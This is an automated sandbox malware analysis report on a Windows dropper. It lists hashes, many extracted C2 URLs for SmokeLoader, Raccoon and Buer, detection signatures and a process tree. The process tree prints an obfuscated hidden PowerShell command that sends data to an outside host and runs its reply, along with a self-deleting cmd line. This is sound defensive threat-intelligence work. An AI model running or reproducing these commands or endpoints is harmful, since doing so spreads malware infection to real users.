Analysis
-
max time kernel
24s -
max time network
605s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20201028
General
-
Target
Install.exe
-
Size
852KB
-
MD5
98d1321a449526557d43498027e78a63
-
SHA1
d8584de7e33d30a8fc792b62aa7217d44332a345
-
SHA256
5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23
-
SHA512
3b6f59dbd605e59152837266a3e7814af463bb2cd7c9341c99fc5445de78e2dde73c11735bd145c6ad9c6d08d2c2810155558d5e9c441ac8b69ed609562385d0
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Extracted
buer
securedocumentsholding.com
Signatures
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/2084-528-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/2084-529-0x0000000003A40000-0x000000000429D000-memory.dmp family_glupteba behavioral3/memory/2084-530-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral3/memory/6020-347-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral3/memory/6020-348-0x0000000000421E06-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral3/files/0x000100000001abe0-102.dat acprotect behavioral3/files/0x000100000001abe0-101.dat acprotect -
Buer Loader 1 IoCs
Detects Buer loader in memory or disk.
resource yara_rule behavioral3/memory/8308-1301-0x0000000040000000-0x0000000040009000-memory.dmp buer -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Executes dropped EXE 23 IoCs
pid Process 696 multitimer.exe 1088 multitimer.exe 568 multitimer.exe 3220 ltqt2n3jwnd.exe 1020 ltqt2n3jwnd.tmp 708 safebits.exe 1180 vict.exe 220 u4hmzydyqpk.exe 2152 askinstall24.exe 1152 Setup3310.exe 1512 vwkcydrale0.exe 3008 vt4qf24ji2h.exe 1656 chashepro3.exe 1036 vpn.exe 3872 IBInstaller_97039.exe 4104 chashepro3.tmp 4124 vict.tmp 4136 Setup3310.tmp 4148 vpn.tmp 4164 IBInstaller_97039.tmp 4384 winlthst.exe 4512 Abbas.exe 4560 Venita.exe -
resource yara_rule behavioral3/files/0x000100000001abe0-102.dat upx behavioral3/files/0x000100000001abe0-101.dat upx -
Loads dropped DLL 13 IoCs
pid Process 1020 ltqt2n3jwnd.tmp 4124 vict.tmp 4136 Setup3310.tmp 4136 Setup3310.tmp 4164 IBInstaller_97039.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\lb5zjcuqvee = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\S6WC71668I\\multitimer.exe\" 1 3.1615014587.60432abb03fd1" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 43 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 869 ipinfo.io 1057 ipinfo.io 464 ipinfo.io 532 ipinfo.io 989 checkip.amazonaws.com 1079 ip-api.com 1105 ipinfo.io 371 ipinfo.io 123 ipinfo.io 134 checkip.amazonaws.com 214 ipinfo.io 917 ipinfo.io 1039 ipinfo.io 1044 ipinfo.io 60 ipinfo.io 516 ipinfo.io 586 ip-api.com 872 ipinfo.io 154 ipinfo.io 1173 ipinfo.io 512 ipinfo.io 318 checkip.amazonaws.com 494 ipinfo.io 847 ipinfo.io 923 ipinfo.io 1146 checkip.amazonaws.com 1165 ipinfo.io 1229 ipinfo.io 57 ipinfo.io 644 checkip.amazonaws.com 831 checkip.amazonaws.com 932 ipinfo.io 984 ipinfo.io 1008 ipinfo.io 1101 checkip.amazonaws.com 1167 ipinfo.io 246 ipinfo.io 281 ip-api.com 701 ipinfo.io 739 ipinfo.io 927 ipinfo.io 1258 checkip.amazonaws.com 211 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Program Files directory 28 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\JCleaner\is-HF44K.tmp chashepro3.tmp File created C:\Program Files (x86)\viewerise\is-B6D8I.tmp ltqt2n3jwnd.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Abbas.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat ltqt2n3jwnd.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\JCleaner\is-755KQ.tmp chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-VUMT8.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\JCleaner\is-HCN8P.tmp chashepro3.tmp File created C:\Program Files (x86)\viewerise\unins000.dat ltqt2n3jwnd.tmp File created C:\Program Files\K246QQERFM\K246QQERF.exe vwkcydrale0.exe File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\8.exe chashepro3.tmp -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
pid pid_target Process procid_target 5672 220 WerFault.exe 135 5880 220 WerFault.exe 135 6108 220 WerFault.exe 135 5388 220 WerFault.exe 135 5456 220 WerFault.exe 135 4272 220 WerFault.exe 135 4616 220 WerFault.exe 135 6376 9256 WerFault.exe 287 6676 9256 WerFault.exe 287 6860 9256 WerFault.exe 287 7024 9256 WerFault.exe 287 7584 9256 WerFault.exe 287 8264 9256 WerFault.exe 287 6768 9256 WerFault.exe 287 7972 10472 WerFault.exe 414 10904 10472 WerFault.exe 414 6716 10472 WerFault.exe 414 8148 7648 WerFault.exe 388 2196 10472 WerFault.exe 414 6740 10472 WerFault.exe 414 6060 10824 WerFault.exe 427 10192 10824 WerFault.exe 427 7492 10824 WerFault.exe 427 5876 10824 WerFault.exe 427 8032 10824 WerFault.exe 427 7612 10824 WerFault.exe 427 -
Delays execution with timeout.exe 5 IoCs
pid Process 5368 timeout.exe 10608 timeout.exe 10592 timeout.exe 6100 timeout.exe 8268 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 12 IoCs
pid Process 2648 taskkill.exe 5968 TASKKILL.exe 6896 taskkill.exe 7496 taskkill.exe 10820 taskkill.exe 7232 taskkill.exe 6032 taskkill.exe 8808 taskkill.exe 5544 taskkill.exe 6700 taskkill.exe 7896 taskkill.exe 9340 taskkill.exe -
Runs .reg file with regedit 2 IoCs
pid Process 6024 regedit.exe 5824 regedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5376 PING.EXE -
Script User-Agent 33 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 1007 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 153 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 531 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 700 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 704 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1041 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 983 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1053 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1171 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 845 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 868 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 929 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 930 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 122 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 871 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1166 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 747 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 914 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1284 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 244 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 370 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 514 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 736 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 375 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 926 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1174 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 58 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 212 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1228 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 462 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 493 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 568 multitimer.exe 4104 chashepro3.tmp 4104 chashepro3.tmp 4384 winlthst.exe 4384 winlthst.exe 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp 4148 vpn.tmp -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1276 Install.exe Token: SeDebugPrivilege 696 multitimer.exe Token: SeDebugPrivilege 568 multitimer.exe Token: SeDebugPrivilege 3008 vt4qf24ji2h.exe Token: SeDebugPrivilege 4148 vpn.tmp Token: SeDebugPrivilege 4148 vpn.tmp -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4104 chashepro3.tmp 4136 Setup3310.tmp 1020 ltqt2n3jwnd.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1276 wrote to memory of 696 1276 Install.exe 76 PID 1276 wrote to memory of 696 1276 Install.exe 76 PID 696 wrote to memory of 1088 696 multitimer.exe 79 PID 696 wrote to memory of 1088 696 multitimer.exe 79 PID 1088 wrote to memory of 568 1088 multitimer.exe 80 PID 1088 wrote to memory of 568 1088 multitimer.exe 80 PID 568 wrote to memory of 3220 568 multitimer.exe 82 PID 568 wrote to memory of 3220 568 multitimer.exe 82 PID 568 wrote to memory of 3220 568 multitimer.exe 82 PID 3220 wrote to memory of 1020 3220 ltqt2n3jwnd.exe 83 PID 3220 wrote to memory of 1020 3220 ltqt2n3jwnd.exe 83 PID 3220 wrote to memory of 1020 3220 ltqt2n3jwnd.exe 83 PID 568 wrote to memory of 708 568 multitimer.exe 84 PID 568 wrote to memory of 708 568 multitimer.exe 84 PID 568 wrote to memory of 708 568 multitimer.exe 84 PID 568 wrote to memory of 1180 568 multitimer.exe 136 PID 568 wrote to memory of 1180 568 multitimer.exe 136 PID 568 wrote to memory of 1180 568 multitimer.exe 136 PID 568 wrote to memory of 220 568 multitimer.exe 135 PID 568 wrote to memory of 220 568 multitimer.exe 135 PID 568 wrote to memory of 220 568 multitimer.exe 135 PID 568 wrote to memory of 2152 568 multitimer.exe 86 PID 568 wrote to memory of 2152 568 multitimer.exe 86 PID 568 wrote to memory of 2152 568 multitimer.exe 86 PID 568 wrote to memory of 1152 568 multitimer.exe 85 PID 568 wrote to memory of 1152 568 multitimer.exe 85 PID 568 wrote to memory of 1152 568 multitimer.exe 85 PID 568 wrote to memory of 1512 568 multitimer.exe 134 PID 568 wrote to memory of 1512 568 multitimer.exe 134 PID 568 wrote to memory of 3008 568 multitimer.exe 133 PID 568 wrote to memory of 3008 568 multitimer.exe 133 PID 568 wrote to memory of 1656 568 multitimer.exe 132 PID 568 wrote to memory of 1656 568 multitimer.exe 132 PID 568 wrote to memory of 1656 568 multitimer.exe 132 PID 568 wrote to memory of 3872 568 multitimer.exe 131 PID 568 wrote to memory of 3872 568 multitimer.exe 131 PID 568 wrote to memory of 3872 568 multitimer.exe 131 PID 568 wrote to memory of 1036 568 multitimer.exe 130 PID 568 wrote to memory of 1036 568 multitimer.exe 130 PID 568 wrote to memory of 1036 568 multitimer.exe 130 PID 1656 wrote to memory of 4104 1656 chashepro3.exe 129 PID 1656 wrote to memory of 4104 1656 chashepro3.exe 129 PID 1656 wrote to memory of 4104 1656 chashepro3.exe 129 PID 1180 wrote to memory of 4124 1180 vict.exe 128 PID 1180 wrote to memory of 4124 1180 vict.exe 128 PID 1180 wrote to memory of 4124 1180 vict.exe 128 PID 1152 wrote to memory of 4136 1152 Setup3310.exe 127 PID 1152 wrote to memory of 4136 1152 Setup3310.exe 127 PID 1152 wrote to memory of 4136 1152 Setup3310.exe 127 PID 1036 wrote to memory of 4148 1036 vpn.exe 87 PID 1036 wrote to memory of 4148 1036 vpn.exe 87 PID 1036 wrote to memory of 4148 1036 vpn.exe 87 PID 3872 wrote to memory of 4164 3872 IBInstaller_97039.exe 126 PID 3872 wrote to memory of 4164 3872 IBInstaller_97039.exe 126 PID 3872 wrote to memory of 4164 3872 IBInstaller_97039.exe 126 PID 4104 wrote to memory of 4368 4104 chashepro3.tmp 124 PID 4104 wrote to memory of 4368 4104 chashepro3.tmp 124 PID 4104 wrote to memory of 4368 4104 chashepro3.tmp 124 PID 1020 wrote to memory of 4384 1020 ltqt2n3jwnd.tmp 123 PID 1020 wrote to memory of 4384 1020 ltqt2n3jwnd.tmp 123 PID 1020 wrote to memory of 4384 1020 ltqt2n3jwnd.tmp 123 PID 4104 wrote to memory of 4408 4104 chashepro3.tmp 122 PID 4104 wrote to memory of 4408 4104 chashepro3.tmp 122 PID 4104 wrote to memory of 4408 4104 chashepro3.tmp 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\S6WC71668I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S6WC71668I\multitimer.exe" 0 3060197d33d91c80.94013368 0 1012⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Users\Admin\AppData\Local\Temp\S6WC71668I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S6WC71668I\multitimer.exe" 1 3.1615014587.60432abb03fd1 1013⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\S6WC71668I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S6WC71668I\multitimer.exe" 2 3.1615014587.60432abb03fd14⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Users\Admin\AppData\Local\Temp\2zcx1syhu4m\ltqt2n3jwnd.exe"C:\Users\Admin\AppData\Local\Temp\2zcx1syhu4m\ltqt2n3jwnd.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\is-2UGBT.tmp\ltqt2n3jwnd.tmp"C:\Users\Admin\AppData\Local\Temp\is-2UGBT.tmp\ltqt2n3jwnd.tmp" /SL5="$8005C,870426,780800,C:\Users\Admin\AppData\Local\Temp\2zcx1syhu4m\ltqt2n3jwnd.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\is-FURM6.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-FURM6.tmp\winlthst.exe" test1 test17⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\VMdrSPQia.exe"C:\Users\Admin\AppData\Local\Temp\VMdrSPQia.exe"8⤵PID:5980
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VMdrSPQia.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\VMdrSPQia.exe" & del C:\ProgramData\*.dll & exit9⤵PID:5204
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VMdrSPQia.exe /f10⤵
- Kills process with taskkill
PID:2648
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
PID:5368
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"8⤵PID:8988
-
